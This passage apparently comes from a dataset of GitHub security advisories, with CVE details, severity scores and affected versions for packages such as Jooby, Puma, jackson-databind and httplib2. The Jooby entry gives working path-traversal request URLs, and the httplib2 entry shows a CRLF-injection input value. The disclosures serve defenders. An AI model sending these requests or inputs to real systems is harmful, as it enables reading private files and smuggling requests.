+```",[],"[{'package': {'ecosystem': 'npm', 'name': 'json-logic-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1542'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/json-logic-js'}]","{'cwe_ids': ['CWE-471'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-12T19:35:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p694-23q3-rvrc,2022-03-18T20:16:31Z,2020-11-04T18:23:25Z,,['CVE-2017-15708'],Remote Code Execution in Apache Synapse,"In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.synapse:synapse-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-15708'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/77f2accf240d25d91b47033e2f8ebec84ffbc6e6627112b2f98b66c9@%3Cdev.synapse.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0fb289cd38c915b9a13a3376134f96222dd9100f1ef66b41631865c6@%3Ccommits.doris.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-37'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/102154'}]","{'cwe_ids': ['CWE-502', 'CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-11-04T18:21:43Z', 'nvd_published_at': '2017-12-11T15:29:00Z'}"
+1.4.0,GHSA-jgrh-5m3h-9c5f,2020-11-10T20:19:42Z,2020-11-09T22:17:13Z,,['CVE-2020-7764'],Web Cache Poisoning in find-my-way,"This affects the package find-my-way before 2.2.5, from 3.0.0 and before 3.0.5. It accepts the Accept-Version' header by default, and if versioned routes are not being used, this could lead to a denial of service. Accept-Version can be used as an unkeyed header in a cache poisoning attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'find-my-way'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'find-my-way'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7764'}, {'type': 'WEB', 'url': 'https://github.com/delvedor/find-my-way/commit/ab408354690e6b9cf3c4724befb3b3fa4bb90aac'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FINDMYWAY-1038269'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/find-my-way'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-11-09T22:16:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-58r4-h6v8-jcvm,2023-05-16T16:04:23Z,2020-11-03T02:31:38Z,,['CVE-2020-15240'],Regression in JWT Signature Validation,"### Overview
+Versions after and including `2.3.0` are improperly validating the JWT token signature when using the `JWTValidator.verify` method. Improper validation of the JWT token signature when not using the default Authorization Code Flow can allow an attacker to bypass authentication and authorization.
+
+### Am I affected?
+You are affected by this vulnerability if all of the following conditions apply:
+
+- You are using `omniauth-auth0`.
+- You are using `JWTValidator.verify` method directly OR you are not authenticating using the SDK’s default Authorization Code Flow.
+
+### How to fix that?
+Upgrade to version `2.4.1`.
+
+### Will this update impact my users?
+The fix provided in this version will not affect your users.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'omniauth-auth0'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/omniauth-auth0/security/advisories/GHSA-58r4-h6v8-jcvm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15240'}, {'type': 'WEB', 'url': 'https://github.com/auth0/omniauth-auth0/commit/fd3a14f4ccdfbc515d1121d6378ff88bf55a7a7a'}, {'type': 'PACKAGE', 'url': 'https://github.com/auth0/omniauth-auth0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/omniauth-auth0/CVE-2020-15240.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/omniauth-auth0'}]","{'cwe_ids': ['CWE-287', 'CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-27T19:10:29Z', 'nvd_published_at': '2020-10-21T18:15:00Z'}"
+1.4.0,GHSA-m2jr-hmc3-qmpr,2023-05-16T16:19:18Z,2020-11-13T17:18:22Z,,['CVE-2020-26223'],Authorization bypass in Spree,"### Impact
+The perpetrator could query the [API v2 Order Status](https://guides.spreecommerce.org/api/v2/storefront#tag/Order-Status) endpoint with an empty string passed as an Order token
+
+### Patches
+Please upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version. Users of Spree < 3.7 are not affected.
+
+### References
+Pull request with a fix and in-depth explanation - https://github.com/spree/spree/pull/10573
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@spreecommerce.org](mailto:security@spreecommerce.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree_api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.13'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree_api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.5'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree_api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/spree/spree/security/advisories/GHSA-m2jr-hmc3-qmpr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26223'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree/pull/10573'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_api/CVE-2020-26223.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree'}, {'type': 'WEB', 'url': 'https://guides.spreecommerce.org/api/v2/storefront#tag/Order-Status'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/spree_api/versions'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-13T17:18:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c7vm-f5p4-8fqh,2021-01-07T22:41:59Z,2020-11-18T21:06:36Z,,['CVE-2020-26215'],Open redirect in Jupyter Notebook,"[localhost](http://localhost:8888)
+
+### Impact
+_What kind of vulnerability is it? Who is impacted?_
+
+Open redirect vulnerability - a maliciously crafted link to a notebook server could redirect the browser to a different website.
+
+All notebook servers are technically affected, however, these maliciously crafted links can only be reasonably made for known notebook server hosts. A link to your notebook server may *appear* safe, but ultimately redirect to a spoofed server on the public internet.
+
+### Patches
+
+_Has the problem been patched? What versions should users upgrade to?_
+
+Patched in notebook 6.1.5
+
+
+### References
+
+[OWASP page on open redirects](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)
+
+### For more information
+
+If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list [security@ipython.org](mailto:security@ipython.org).
+
+Credit: zhuonan li of Alibaba Application Security Team","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'notebook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.1.4'}}]","[{'type': 'WEB', 'url': 'https://github.com/jupyter/notebook/security/advisories/GHSA-c7vm-f5p4-8fqh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26215'}, {'type': 'WEB', 'url': 'https://github.com/jupyter/notebook/commit/3cec4bbe21756de9f0c4bccf18cf61d840314d74'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/12/msg00004.html'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-11-18T21:05:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4rcq-jv2f-898j,2023-01-27T21:41:57Z,2020-05-08T19:05:05Z,,['CVE-2020-11054'],Incorrect Provision of Specified Functionality in qutebrowser,"# Description
+
+After a certificate error was overridden by the user, qutebrowser displays the URL as yellow (`colors.statusbar.url.warn.fg`). However, when the affected website was subsequently loaded again, the URL was mistakenly displayed as green (`colors.statusbar.url.success_https`). While the user already has seen a certificate error prompt at this point (or set `content.ssl_strict` to `false` which is not recommended), this could still provide a false sense of security.
+
+# Affected versions and patches
+
+All versions of qutebrowser are believed to be affected, though versions before v0.11.x couldn't be tested.
+
+The issue is fixed in qutebrowser v1.11.1 (pending release) and v1.12.0 (unreleased). Backported patches for older versions are available, but no further releases are planned.
+
+# Mitigation
+
+If you are unable to upgrade:
+
+- Treat any host with a certificate exception as insecure, ignoring the URL color
+- Or set `content.ssl_strict` to `True` (instead of `'ask'`), preventing certificate exceptions
+
+# References
+
+- qutebrowser issue: https://github.com/qutebrowser/qutebrowser/issues/5403
+- Fix (master branch): https://github.com/qutebrowser/qutebrowser/commit/021ab572a319ca3db5907a33a59774f502b3b975
+- Related issue for KDE Falkon: https://bugs.kde.org/show_bug.cgi?id=420902
+- Related issue for eric6 Web Browser: https://tracker.die-offenbachs.homelinux.org/eric/issue328 (fixed in eric6 20.6)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'qutebrowser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/security/advisories/GHSA-4rcq-jv2f-898j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11054'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/issues/5403'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/021ab572a319ca3db5907a33a59774f502b3b975'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/19f01bb42d02da539446a52a25bb0c1232b86327'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/1b7946ed14b386a24db050f2d6dba81ba6518755'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/2281a205c3e70ec20f35ec8fafecee0d5c4f3478'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/4020210b193f77cf1785b21717f6ef7c5de5f0f8'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/6821c236f9ae23adf21d46ce0d56768ac8d0c467'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/9bd1cf585fccdfe8318fff7af793730e74a04db3'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/a45ca9c788f648d10cccce2af41405bf25ee2948'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/d28ed758d077a5bf19ddac4da468f7224114df23'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/f5d801251aa5436aff44660c87d7013e29ac5864'}, {'type': 'WEB', 'url': 'https://bugs.kde.org/show_bug.cgi?id=420902'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7YWJ5QNHXKTGG5NLV7EGEOKPBVZBA5GS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKAZOOTJ2MBHTYVYQQ52NL53F5CB2XAP/'}, {'type': 'WEB', 'url': 'https://tracker.die-offenbachs.homelinux.org/eric/issue328'}]","{'cwe_ids': ['CWE-684'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-05-08T19:04:30Z', 'nvd_published_at': '2020-05-07T21:15:00Z'}"
+1.4.0,GHSA-px9h-x66r-8mpc,2021-08-25T21:08:32Z,2020-05-13T16:29:26Z,,['CVE-2020-7647'],path traversal in Jooby,"### Impact
+Access to sensitive information available from classpath.
+
+### Patches
+Patched version: 1.6.7 and 2.8.2
+
+Commit 1.x: https://github.com/jooby-project/jooby/commit/34f526028e6cd0652125baa33936ffb6a8a4a009
+
+Commit 2.x: https://github.com/jooby-project/jooby/commit/c81479de67036993f406ccdec23990b44b0bec32
+
+### Workarounds
+_Is there a way for users to fix or remediate the vulnerability without upgrading?_
+
+### References
+
+Latest 1.x version: 1.6.6
+
+#### Arbitrary class path resource access 1
+When sharing a *File System* directory as in:
+
+``` java
+assets(""/static/**"", Paths.get(""static""));
+```
+
+The class path is also searched for the file (`org.jooby.handlers.AssetHandler.loader`):
+[jooby/AssetHandler.java at 1.x · jooby-project/jooby · GitHub](https://github.com/jooby-project/jooby/blob/1.x/jooby/src/main/java/org/jooby/handlers/AssetHandler.java)
+
+``` java
+ private static Loader loader(final Path basedir, final ClassLoader classloader) {
+ if (Files.exists(basedir)) {
+ return name -> {
+ Path path = basedir.resolve(name).normalize();
+ if (Files.exists(path) && path.startsWith(basedir)) {
+ try {
+ return path.toUri().toURL();
+ } catch (MalformedURLException x) {
+ // shh
+ }
+ }
+ return classloader.getResource(name);
+ };
+ }
+ return classloader::getResource;
+ }
+```
+
+If we send `/static/WEB-INF/web.xml` it will fail to load it from the file system but will go into `classloader.getResource(name)` where name equals `/WEB-INF/web.xml` so will succeed and return the requested file. This way we can get any configuration file or even the application class files
+
+If assets are configured for a certain extension we can still bypass it. eg:
+
+```java
+assets(""/static/**/*.js"", Paths.get(""static""));
+```
+
+We can send:
+
+```
+http://localhost:8080/static/io/yiss/App.class.js
+```
+
+#### Arbitrary class path resource access 2
+This vulnerability also affects assets configured to access resources from the root of the class path. eg:
+
+```java
+assets(""/static/**"");
+```
+
+In this case we can traverse `static` by sending:
+
+```
+http://localhost:8080/static/..%252fio/yiss/App.class
+```
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [jooby](https://github.com/jooby-project/jooby/issues)
+* Email us at [support@jooby.io](mailto:support@jooby.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jooby:jooby'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jooby:jooby'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jooby-project/jooby/security/advisories/GHSA-px9h-x66r-8mpc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7647'}, {'type': 'WEB', 'url': 'https://github.com/jooby-project/jooby/commit/34f526028e6cd0652125baa33936ffb6a8a4a009'}, {'type': 'PACKAGE', 'url': 'https://github.com/jooby-project/jooby'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-IOJOOBY-568806'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-IOJOOBY-568806,'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGJOOBY-568807'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGJOOBY-568807,'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-12T20:27:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v3xw-c963-f5hc,2021-08-25T20:59:49Z,2020-05-15T18:58:50Z,,['CVE-2020-11111'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11111'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2664'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200403-0002/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T19:31:18Z', 'nvd_published_at': '2020-03-31T05:15:00Z'}"
+1.4.0,GHSA-7qx4-pp76-vrqh,2021-07-28T18:49:53Z,2020-05-21T19:08:08Z,,['CVE-2020-1953'],Remote code execution in Apache Commons Configuration,"Apache Commons Configuration uses a third-party library to parse YAML files which by default allows the instantiation of classes if the YAML includes special statements. Apache Commons Configuration versions 2.2, 2.3, 2.4, 2.5, 2.6 did not change the default settings of this library. So if a YAML file was loaded from an untrusted source, it could therefore load and execute code out of the control of the host application.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.commons:commons-configuration2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2'}, {'fixed': '2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1953'}, {'type': 'WEB', 'url': 'https://github.com/apache/commons-configuration/commit/add7375cf37fd316d4838c6c56b054fc293b4641'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/d0e00f2e147a9e9b13a6829133092f349b2882bf6860397368a52600@%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r16a2e949e35780c8974cf66104e812410f3904f752df6b66bf292269@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rde2186ad6ac0d6ed8d51af7509244adcf1ce0f9a3b7e1d1dd3b64676@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-21T17:12:19Z', 'nvd_published_at': '2020-03-13T15:15:00Z'}"
+1.4.0,GHSA-w64w-qqph-5gxm,2023-05-16T15:55:12Z,2020-05-22T14:55:09Z,,['CVE-2020-11077'],HTTP Smuggling via Transfer-Encoding Header in Puma,"### Impact
+This is a similar but different vulnerability to the one patched in 3.12.5 and 4.3.4.
+
+A client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client.
+
+If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client.
+
+### Patches
+
+The problem has been fixed in Puma 3.12.6 and Puma 4.3.5.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue in [Puma](https://github.com/puma/puma)
+* See our [security policy](https://github.com/puma/puma/security/policy)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.12.6'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/puma/puma/security/advisories/GHSA-w64w-qqph-5gxm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11077'}, {'type': 'PACKAGE', 'url': 'https://github.com/puma/puma'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/blob/master/History.md#434435-and-31253126--2020-05-22'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puma/CVE-2020-11077.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/10/msg00009.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SKIY5H67GJIGJL6SMFWFLUQQQR3EMVPR/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00034.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00038.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-22T14:46:33Z', 'nvd_published_at': '2020-05-22T15:15:00Z'}"
+1.4.0,GHSA-rf6r-2c4q-2vwg,2021-08-25T20:58:41Z,2020-05-15T18:58:54Z,,['CVE-2020-10968'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10968'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2662'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind/'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200403-0002/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T19:30:49Z', 'nvd_published_at': '2020-03-26T13:15:00Z'}"
+1.4.0,GHSA-cc94-3v9c-7rm8,2021-06-15T17:57:09Z,2020-05-21T21:08:56Z,,['CVE-2020-1941'],Apache ActiveMQ webconsole admin GUI is open to XSS,"In Apache ActiveMQ 5.0.0 to 5.15.11, the webconsole admin GUI is open to XSS, in the view that lists the contents of a queue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.activemq:activemq-web-console'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.15.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1941'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb2fd3bf2dce042e0ab3f3c94c4767c96bb2e7e6737624d63162df36d@%3Ccommits.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4672802b0e5ed67c08c9e77057d52138e062f77cc09581b723cf95a@%3Ccommits.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'http://activemq.apache.org/security-advisories.data/CVE-2020-1941-announcement.txt'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-21T17:36:06Z', 'nvd_published_at': '2020-05-14T17:15:00Z'}"
+1.4.0,GHSA-gg84-qgv9-w4pq,2021-01-08T20:16:56Z,2020-05-20T15:55:47Z,,['CVE-2020-11078'],CRLF injection in httplib2,"### Impact
+Attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server.
+
+Impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.
+
+### Patches
+Problem has been fixed in 0.18.0
+Space, CR, LF characters are now quoted before any use.
+This solution should not impact any valid usage of httplib2 library, that is uri constructed by urllib.
+
+### Workarounds
+Create URI with `urllib.parse` family functions: `urlencode`, `urlunsplit`.
+
+```diff
+user_input = "" HTTP/1.1\r\ninjected: attack\r\nignore-http:""
+-uri = ""https://api.server/?q={}"".format(user_input)
++uri = urllib.parse.urlunsplit((""https"", ""api.server"", ""/v1"", urllib.parse.urlencode({""q"": user_input}), """"))
+http.request(uri)
+```
+
+### References
+https://cwe.mitre.org/data/definitions/93.html
+https://docs.python.org/3/library/urllib.parse.html
+
+Thanks to Recar https://github.com/Ciyfly for finding vulnerability and discrete notification.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)
